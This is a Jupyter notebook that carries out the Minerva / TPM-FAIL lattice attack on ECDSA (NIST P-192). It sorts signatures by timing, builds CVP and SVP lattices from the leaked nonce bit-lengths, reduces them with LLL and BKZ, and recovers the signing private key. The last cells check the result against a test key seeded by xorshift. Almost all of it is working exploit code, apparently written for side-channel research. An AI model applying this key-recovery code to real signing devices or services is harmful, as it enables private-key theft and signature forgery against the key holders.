# Nonce bit-length leak attack (Minerva, TPM-FAIL, ...)

In [ ]:
from fpylll import LLL, BKZ, IntegerMatrix, GSO
from pyecsca.sca.trace_set import PickleTraceSet
from pyecsca.ec.params import get_params
from pyecsca.ec.mod import Mod

In [ ]:
curve = get_params("nist", "P-192", "projective")
n = curve.order

Read the collected traces.

In [ ]:
trace_set = PickleTraceSet.read("traces.pickle")

Get the signatures out of the traces and sort them by duration (fastest first).

In [ ]:
signatures = [(trace.meta["duration"], trace.meta["signature"], trace_set.hash) for trace in trace_set]
signatures.sort()

pubkey = trace_set.pubkey

Compute the $t = s^{-1} r$ and $u = - s^{-1} h$ values from the signatures. 

In [ ]:
def compute_tu(r: int, s: int, h: int):
    r = Mod(r, n)
    s = Mod(s, n)
    h = Mod(h, n)
    s_inv = s.inverse()
    t = s_inv * r
    u = - s_inv * h
    return int(t), int(u)

Estimate the number of leading zero bits at signature with `index`, assuming sorted `total` of collected signatures.

In [ ]:
def compute_bound(index: int, total: int):
    i = 1
    while (total) / (2 ** i) >= index + 1:
        i += 1
    i -= 1
    if i <= 1:
        return 0
    return i

Construct the CVP lattice and target vector.

$$
B = \begin{pmatrix}
2^{l_1+1}n & 0 & 0 & \ldots & 0 & 0 \\
0 & 2^{l_2+1}n & 0 & \ldots & 0 & 0 \\
& \vdots & & & \vdots & \\
0 & 0 & 0 & \ldots & 2^{l_d+1}n & 0 \\
2^{l_1+1}t_1 & 2^{l_2+1}t_2 & 2^{l_3+1}t_3 & \ldots & 2^{l_d+1}t_d & 1
\end{pmatrix}
$$

$$ v = \begin{pmatrix}2^{l_1+1}u_1 + n & 2^{l_2+1}u_2 + n & \ldots & 2^{l_d+1}u_d + n & 0\end{pmatrix} $$

In [ ]:
def construct_cvp(sigs, total):
    size = len(sigs)
    dim = size + 1
    B = IntegerMatrix(dim, dim)
    v = [0] * dim
    for i, sig in enumerate(sigs):
        bound = compute_bound(i, total) + 1
        r, s = sig[1]
        h = int.from_bytes(sig[2], byteorder="big")
        t, u = compute_tu(r, s, h)
        
        B[i, i] = (2 ** bound) * n
        B[size, i] = (2 ** bound) * t
        
        v[i] = (2 ** bound) * u + n
    B[size, size] = 1
    return B, v

Construct the SVP lattice.

$$
C = \begin{pmatrix}
2^{l_1+1}n & 0 & 0 & \ldots & 0 & 0 & 0 \\
0 & 2^{l_2+1}n & 0 & \ldots & 0 & 0 & 0 \\
& \vdots & & & \vdots & & \\
0 & 0 & 0 & \ldots & 2^{l_d+1}n & 0 & 0\\
2^{l_1+1}t_1 & 2^{l_2+1}t_2 & 2^{l_3+1}t_3 & \ldots & 2^{l_d+1}t_d & 1 & 0\\
2^{l_1+1}u_1 + n & 2^{l_2+1}u_2 + n & 2^{l_3+1}u_3 + n & \ldots & 2^{l_d+1}u_d + n & 0 & n
\end{pmatrix}
$$

In [ ]:
def construct_svp(sigs, total):
    size = len(sigs)
    dim = size + 2
    C = IntegerMatrix(dim, dim)
    sb = 0
    for i, sig in enumerate(sigs):
        bound = compute_bound(i, total) + 1
        r, s = sig[1]
        h = int.from_bytes(sig[2], byteorder="big")
        t, u = compute_tu(r, s, h)
        
        C[i, i] = (2 ** bound) * n
        C[size, i] = (2 ** bound) * t
        
        C[size + 1, i] = (2 ** bound) * u + n
    C[size, size] = 1
    C[size + 1, size + 1] = n
    return C

Reduce the SVP lattice.

In [ ]:
C = construct_svp(signatures[:150], len(signatures))
M = GSO.Mat(C)
M.update_gso()
L = LLL.Reduction(M)
L()

C = BKZ.reduction(C, BKZ.Param(30, strategies=BKZ.DEFAULT_STRATEGY, auto_abort=True))

Extract the private key from the second to last column of the reduced SVP lattice basis.

In [ ]:
def extract_privkey(lattice, pubkey):
    for row in lattice:
        privkey_guess = row[-2] % n
        if privkey_guess:
            pubkey_guess = curve.curve.affine_multiply(curve.generator.to_affine(), privkey_guess)
            if pubkey_guess.x == pubkey[0] and pubkey_guess.y == pubkey[1]:
                return privkey_guess
        privkey_guess = (n - privkey_guess) % n
        if privkey_guess:
            pubkey_guess = curve.curve.affine_multiply(curve.generator.to_affine(), privkey_guess)
            if pubkey_guess.x == pubkey[0] and pubkey_guess.y == pubkey[1]:
                return privkey_guess
    return None
priv = extract_privkey(C, pubkey)
print(priv)

In [ ]:
from utils import xorshift32

In [ ]:
x = xorshift32(0xcafebabe)
priv = int.from_bytes(x.next_bytes(24), byteorder="little")

In [ ]:
curve.curve.affine_multiply(curve.generator.to_affine(), priv)